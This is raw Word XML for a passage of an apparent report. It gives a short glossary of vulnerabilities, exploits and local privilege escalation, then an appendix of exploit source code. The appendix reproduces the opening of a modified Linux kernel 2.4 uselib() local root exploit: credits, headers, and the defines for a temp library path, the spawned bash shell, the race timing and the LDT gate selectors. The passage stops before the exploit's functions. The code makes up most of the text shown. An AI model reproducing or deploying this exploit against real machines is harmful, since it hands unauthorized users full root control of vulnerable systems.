      <w:bookmarkEnd w:id="23"/>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:p w14:paraId="54C4221C" w14:textId="125D94A7" w:rsidR="00AE6C4E" w:rsidRDefault="00E56EA6" w:rsidP="001E08E5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Loc</w:t>
      </w:r>
      <w:r w:rsidR="00525D34">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>al Privilege Elevation Exploit:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B1C8856" w14:textId="45E5E76E" w:rsidR="00525D34" w:rsidRDefault="00525D34" w:rsidP="001E08E5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">A </w:t>
      </w:r>
      <w:r w:rsidRPr="00525D34">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>vulnerability</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a programming error that weakens a computer’s security. The classic example is </w:t>
      </w:r>
      <w:r w:rsidR="00776844">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> buffer overflow.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DEAA398" w14:textId="40E63B08" w:rsidR="00525D34" w:rsidRDefault="00776844" w:rsidP="001E08E5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">An </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a program that takes advantage of a </w:t>
      </w:r>
      <w:r w:rsidRPr="00E9522E">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>vulnerability</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> to accomplish something that should not be able to be accomplished.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7710219B" w14:textId="53228A9B" w:rsidR="00776844" w:rsidRDefault="00776844" w:rsidP="001E08E5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00776844">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Privilege escalation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the act of gaining full access to a computer (which allows, for example, the viewing / copying / theft of sensitive information) while logged into a user account whose privileges are normally restricted. Privilege escalation is accomplished by running an </w:t>
      </w:r>
      <w:r w:rsidRPr="00E9522E">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C051B4" w14:textId="181CC619" w:rsidR="00E9522E" w:rsidRPr="00E9522E" w:rsidRDefault="00E9522E" w:rsidP="001E08E5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Local</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> exploits are run while directly</w:t>
      </w:r>
      <w:r w:rsidR="000C087C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> logged into the target machine (implying that at least one username / password is known for the target). This is as opposed to a remote exploit, which is run against a target over a network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F4B3EF" w14:textId="1DE77CB2" w:rsidR="00204DD5" w:rsidRDefault="000B6516" w:rsidP="000B6516">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="_Toc422058359"/>
      <w:r>
        <w:t>APPENDIX 2: Exploit Source Code</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
    </w:p>
    <w:p w14:paraId="5CF42976" w14:textId="77777777" w:rsidR="000B6516" w:rsidRDefault="000B6516" w:rsidP="000B6516"/>
    <w:p w14:paraId="04A3BF5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8EFF8A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 Linux kernel 2.4 uselib() privilege elevation exploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49239B5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760AABD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 original exploit source from http://isec.pl</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1270795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 reference: http://isec.pl/vulnerabilities/isec-0021-uselib.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FEC6EB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2C619BA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 I modified the Paul Starzetz's exploit, made it more possible</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="379D690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 to race successfully. The exploit still works only on 2.4 series.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD3FC9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 It should be also works on 2.4 SMP, but not easy. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B8D7FF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5E7354D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 thx newbug.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="098B813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47E9208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 Tim Hsu &lt;timhsu at chroot.org&gt; Jan 2005.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5590C29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2D84F60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60DEB9E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5B8F244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GNU_SOURCE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D6F31E0" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DD92AC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include &lt;stdio.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F4BDEC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tdlib.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CAF40A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tring.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A4F386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fcntl.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C32BD8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unistd.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="019E9BA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errno.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC6D9F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ched.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33A4D9A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yscall.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="563FE4A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limits.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C3442A5" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BED9B9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ys/types.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5575EB9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ys/wait.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27DC82A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ys/time.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="518D4FB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ys/mman.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3537A31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sys/sysinfo.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32780551" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4170C01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linux/elf.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D8690D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linux/linkage.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E6E86EE" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="013B2C9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asm/page.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="562B0F7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asm/ldt.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CFD74A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clude &lt;asm/segment.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32709B29" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24FD36B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str(s) #s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21297EA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xstr(s) str(s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FED650D" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="614A720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MREMAP_MAYMOVE  1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000522E8" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6018BFC6" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3081F03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temp lib location</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E8404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define LIBNAME </w:t>
      </w:r>
      <w:r w:rsidRPr="007A6DCF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>"/tmp/_elf_lib"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FF77BCC" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5455394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hell name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6483D99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w:t>
      </w:r>
      <w:r w:rsidRPr="007A6DCF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>SHELL</w:t>
      </w:r>
      <w:r w:rsidRPr="007A6DCF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="007A6DCF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>"/bin/bash"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="313EA263" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AE87C7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time delta to detect race</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53FBCC8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RACEDELTA</w:t>
      </w:r>
      <w:r w:rsidRPr="007A6DCF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>5000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE23513" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A1B188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if you have more deadbabes in memory, change this</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C88F23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MAGIC</w:t>
      </w:r>
      <w:r w:rsidRPr="007A6DCF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="007A6DCF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>0xdeadbabe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC04B5F" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="181841DF" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75A3D0F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do not touch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="289576F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w:t>
      </w:r>
      <w:r w:rsidRPr="007A6DCF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>SLAB_THRSH</w:t>
      </w:r>
      <w:r w:rsidRPr="007A6DCF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>128</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0901C1B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w:t>
      </w:r>
      <w:r w:rsidRPr="007A6DCF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>SLAB_PER_CHLD</w:t>
      </w:r>
      <w:r w:rsidRPr="007A6DCF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>(INT_MAX - 1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2371571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LIB_SIZE</w:t>
      </w:r>
      <w:r w:rsidRPr="007A6DCF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>( PAGE_SIZE * 4 )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E27878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STACK_SIZE</w:t>
      </w:r>
      <w:r w:rsidRPr="007A6DCF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>( PAGE_SIZE * 4 )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D87A614" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37FB2B2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LDT_PAGES</w:t>
      </w:r>
      <w:r w:rsidRPr="007A6DCF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>( (LDT_ENTRIES*LDT_ENTRY_SIZE+PAGE_SIZE-1)/PAGE_SIZE )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B3417F" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CE4862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ENTRY_GATE</w:t>
      </w:r>
      <w:r w:rsidRPr="007A6DCF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>( LDT_ENTRIES-1 )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55FC021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SEL_GATE</w:t>
      </w:r>
      <w:r w:rsidRPr="007A6DCF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>( (ENTRY_GATE&lt;&lt;3)|0x07 )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE886AB" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="568319F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ENTRY_LCS</w:t>
      </w:r>
      <w:r w:rsidRPr="007A6DCF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>( ENTRY_GATE-2 )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E87523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SEL_LCS</w:t>
      </w:r>
      <w:r w:rsidRPr="007A6DCF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="007A6DCF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>( (ENTRY_LCS&lt;&lt;3)|0x04 )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="286A3178" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CF89D7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ENTRY_LDS</w:t>
      </w:r>
      <w:r w:rsidRPr="007A6DCF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>( ENTRY_GATE-1 )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38BE968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SEL_LDS</w:t>
      </w:r>
      <w:r w:rsidRPr="007A6DCF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="007A6DCF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>( (ENTRY_LDS&lt;&lt;3)|0x04 )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02A1BC3F" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11BF726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kB</w:t>
      </w:r>
      <w:r w:rsidRPr="007A6DCF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="007A6DCF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>* 1024</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78940DF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MB</w:t>
      </w:r>
      <w:r w:rsidRPr="007A6DCF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="007A6DCF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>* 1024 kB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E8B0F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GB</w:t>
      </w:r>
      <w:r w:rsidRPr="007A6DCF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="007A6DCF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>* 1024 MB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13D90344" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="075F08E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TMPLEN</w:t>
      </w:r>
      <w:r w:rsidRPr="007A6DCF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="007A6DCF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>256</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E4EDB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PGD_SIZE</w:t>
      </w:r>
      <w:r w:rsidRPr="007A6DCF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>( PAGE_SIZE*1024 )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60806BFB" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
